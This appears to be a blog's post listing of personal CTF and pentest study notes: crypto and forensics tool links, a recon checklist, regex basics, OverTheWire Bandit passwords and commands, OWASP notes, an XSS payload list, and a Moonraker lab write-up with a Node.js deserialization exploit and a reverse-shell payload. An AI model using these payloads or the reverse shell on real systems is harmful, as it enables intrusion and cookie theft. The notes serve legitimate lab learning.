Skip to main content

Posts

Showing posts from January, 2019

Forensics & Crypto

Online Decoder --> https://2cyr.com/decode/ Encoding errors -->  https://ftfy.now.sh/ File Signatures List -->  Click here PCAP Analysis: -->  https://www.packettotal.com/ Online Cipher Decryptors: CyberChef  - Cipher Decoder   Crack Station-Hash Cracke r Decrypt Any Kind of Hash 1)  Cipher Statistics 2)  Index of Coincidence Calculator - Online IC Cryptanalysis Tool 3)  Tools List (Awesome and Fantastic Tools) Available on dCode 4)  Solve an Aristocrat or Patristocrat 5)  RSA attack tool (mainly for ctf) - retreive private key from weak public key and/or uncipher data 5-1)  RSA - Find PQ using N 6)  BertNase's Own Hide content in a Image made of blocks - npiet fun! 7)  Vigenere Solver - www.guballa.de 8)  Fernet (Decode) 9)  Unicode Text Steganography Encoders/Decoders 10)  All in ONE encoders and Decoders Tool 11) Cryptii - Decoder Image Forensics: 1)  Forensically, free online photo forensics tools - 29a.ch 2)  StegSolve to decryt data in

Consider

Consider 1) view page source 2) robots.txt 3) search all interesting names in google 3) use dirb to get all pages list 4) check for url's 5) intercept the page in burpsuite & send it to repeater (check response) 6) if there is a input box --> might be a terminal 7) Note down all URL's - might be any encryption code 8) always try to bruteforce -- use cupp -i 9) dig into all the folders always 10) see for flags in every page 11) check multiple times.. order is imp sometimes 13) consider all names and try them to login 14) check /license.txt for version numbers Use online decoders --> https://2cyr.com/decode/

RegEx

RegEx --------------------------- REGULAR EXPRESSIONS ------------------------------------- /   regex     / ** dont use "/"  forward slash .. inside your regular expression, should be used at the start and end "Space" is also a regular expression ------------------------| Literal Characters:     | ------------------------| 1. Regex --> /ohn/ test String --> ohn, john, mohn{only ohn is matched} 2. Regex -->  /color/ String --> color, colour {color is matched} ------------------------| Modes: | ------------------------| modes are placed after ending..  / /regex/ mode /regex/       {standard mode- nothing after ending forward slash} /regex/g {global} /regex/s {Single line mode} /regex/i {Case INSensitive Mode} /regex/m {multi line mode} Global Mode: /regex/g ------------ global - more than one ; all of the matched strings are selected at once Case Insensitive: /regex/i "or" /regex/gi --------------

Bandit CTF

Bandit CTF ssh bandit7@bandit.labs.overthewire.org -p 2220 3 - UmHadQclWmgdLOKQ3YNgjWxGoRMb5luK 4 - pIwrPrtPN36QITSp3EQaw936yaFoFgAB 5 - koReBOKuIDDepwhWk7jZC0RTdopnAYKh 6 - DXjZPULLxYr17uwoI01bNLQbtFemEgo7 7 - HKBPTKQnIay4Fw76bEy8PVxKEDQRKTzs /--> find / -size 33c -user bandit7 -group bandit6 2>/dev/null -->  cat /var/lib/dpkg/info/bandit7.password 8 - cvX2JJa4CFALtqS87jk27qwqGhBM9plV /--> grep "millionth" data.txt 9 - UsvVyFSfZZWbi6wgC7dAFyFuR6jQQUhR /--> cat data.txt | sort | uniq -c | grep 1 / unique value 10 -truKLdjsbJ5g7yyJ2X2R0o3a5HQJFuLk /--> strings data.txt | grep "==" /search for something with req text 11- IFukwKGsFW8MOq3IRFqrxE1hxTNEbUPR 12- 5Te8Y4drgCRfCx8ugdwuEX8KFC6k2EUu /--> cat data.txt | tr a-zA-Z n-za-mN-ZA-M /find rot13 text 13- 8ZjyCRiBWFYkneahHwxCv3wb2a1ORpYL 14- 4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e / ssh -i sshkey.private bandit14@localhost 15- BfMYroe26WYalil77FoDi9qh59eK5xNr /echo 4wcYUJFw0k0XL

OWASP

OWASP OWASP is non profitable worldwide charitable organization focuses on improving the security of web applications, with the intension to make application security visible and to understand application security risks. OWASP is the group focused on understanding and improving the security of web applications and web services. Network Security Mostly Ignores the Contents of HTTP Traffic. SSL, Intrusion Detection Systems, Operating System Hardening, Database Hardening. Web Application Security is just as important as Network Security. ==================================          A1-Injection Attack: =================================== Injection attack is injecting malicious code to the application through input parameters of the application while the parameters being passed to the interpreters. There are different types of Injection attacks:  SQL injection is Injecting malicious SQL characters through the parameters manipulating the underlying queries affecting

XSS

XSS https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet <script>alert(123);</script> <ScRipT>alert("XSS");</ScRipT> <script>alert(123)</script> <script>alert("hellox worldss");</script> <script>alert(“XSS”)</script> <script>alert(“XSS”);</script> <script>alert(‘XSS’)</script> “><script>alert(“XSS”)</script> <script>alert(/XSS”)</script> <script>alert(/XSS/)</script> </script><script>alert(1)</script> alert(1) "alert(1)" *alert(1)* "><svg%09onload=alert%26%230000000040document.cookie)>%09 ‘; alert(1); ‘)alert(1);// "-prompt(8)-" '-prompt(8)-' ";a=prompt,a()// ';a=prompt,a()// '-eval("window['pro'%2B'mpt'](8)")-' "-eval("window['pro

Moonraker VM

Moonraker nmap -p- -A 192.168.239.135 --open tail -f /var/log/apache2/access.log https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/ echo {"\"username\""}:"\"_\$\$ND_FUNC\$\$_function (){ eval(String.fromCharCode($(python exploit.py)) )}()\""} | base64 -w0 Exploit Payload: Something is wr --------------- var net = require('net'); var spawn = require('child_process').spawn; HOST="127.0.0.1"; PORT="1337"; TIMEOUT="5000"; if (typeof String.prototype.contains === 'undefined') { String.prototype.contains = function(it) { return this.indexOf(it) != -1; }; } function c(HOST,PORT) {     var client = new net.Socket();     client.connect(PORT, HOST, function() {         var sh = spawn('/bin/sh',[]);         client.write("Connected!\n");         client.pipe(sh.stdin);         sh.stdout.pipe(client);      

GREP

Match Everything after a word grep -Po 'WORD(.*)' grep -oP '(?<=release)[^ ]*' check this Print all the directories in the given path with Full Absolute Path ls -d1 "$(pwd)"/*/ Grep inside a Folder Recursive grep -nr '100068 2,3,4,5 32800/udp cmsd' grep -nr 'A Wordpress installation was found' | grep -v AutoRecon | cut -d '/' -f1 | sort -u Grep IP Address and Ports from Nmap Scan Ouput egrep -v "^#|Status: Up" 113-vlan | cut -d' ' -f2,4- | sed -n -e 's/Ignored.*//p' | grep open | sed 's/\/\/\/\///g' |sed 's/\/\/\///g' | sed 's/open\///g' | sed 's#//#/#g' Output: 127.0.0.1 80,443 127.0.0.2 8080, 9191 List directories which don't contain sub-directory named recon. find . -type d -exec test -e "{}/recon" \; -prune -o -type d -print| cut -d '/' -f2 Grep data from multiple webpages and Print everything after a given word for ip in $(cat $1);